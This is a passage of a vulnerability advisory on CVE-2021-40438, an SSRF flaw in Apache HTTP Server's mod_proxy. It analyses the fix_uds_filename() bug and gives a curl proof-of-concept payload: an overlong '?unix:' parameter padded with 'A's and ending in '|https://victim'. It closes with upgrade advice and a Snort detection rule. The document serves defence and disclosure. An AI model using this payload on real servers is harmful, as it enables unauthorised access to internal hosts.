AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://google.com/"

[Figure 3] curl result

- Accessing the URL directly likewise redirects to google.com

[Figure 4] URL access (top) and redirect (bottom)

- Inspecting the above packet in Wireshark gives [Figure 5]

[Figure 5] Wireshark capture

2.2 Analysis

- The vulnerability occurs in the "fix_uds_filename()" function in proxy_util.c during URI validation

- This function is judged to be the one that decides UDS (Unix Domain Socket) redirection within mod_proxy.

- Normally the actual URI to use for the redirection is extracted by placing the "unix:" string somewhere in the URI

- Such URIs should be generated internally by Apache, but because access to an arbitrary domain socket is possible, an SSRF vulnerability arises

[Figure 6] Location of the vulnerability

- Additionally, the attack code is long in order to make the length check against APR_PATH_MAX return an error.

[Figure 7] APR_PATH_MAX

- The error from the length check makes ap_runtime_dir_relative() return NULL

- ap_runtime_dir_relative() is called by the fix_uds_filename() shown in [Figure 6], and there is no further validation of the returned value.

- The returned NULL value is judged to be overwritten with the arbitrary URL requested by the attacker; in other words, the error allows a bypass

[Figure 8] Call to ap_runtime_dir_relative()

 

2.3 PoC

- The PoC is structured as follows

① On source (the vulnerable server), the value of the unix parameter is filled with a large number of A's

② Through the vulnerability and the error identified in 2.2 Analysis, the request is redirected to the target server (victim)

curl "https://source/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|https://victim"

 

3. Countermeasures

3.1 Server side

① Upgrade Apache HTTP Server to version 2.4.49 or later

- The patch appears to add length validation of the user-supplied value at lines 2277 and 2278

[Figure 9] Patch code

3.2 Network side

① Apply a detection rule derived from the published PoC

- The PoC is confirmed to use "?unix:" and "|http"

- "3a" and "7c" are the hex encodings of ":" and "|" respectively

alert tcp any any -> any any (msg:"Apache HTTP Server SSRF (CVE-2021-40438)"; flow:established,from_client; urilen:>200; content:"GET"; http_method; content:"/?unix|3a|"; http_uri; nocase; fast_pattern; content:"|7c|http"; http_uri; sid:1000001; rev:1;)

- sid/rev are required for the rule to load; 1000001 is a placeholder in the local rule range and should be replaced with a site-assigned value
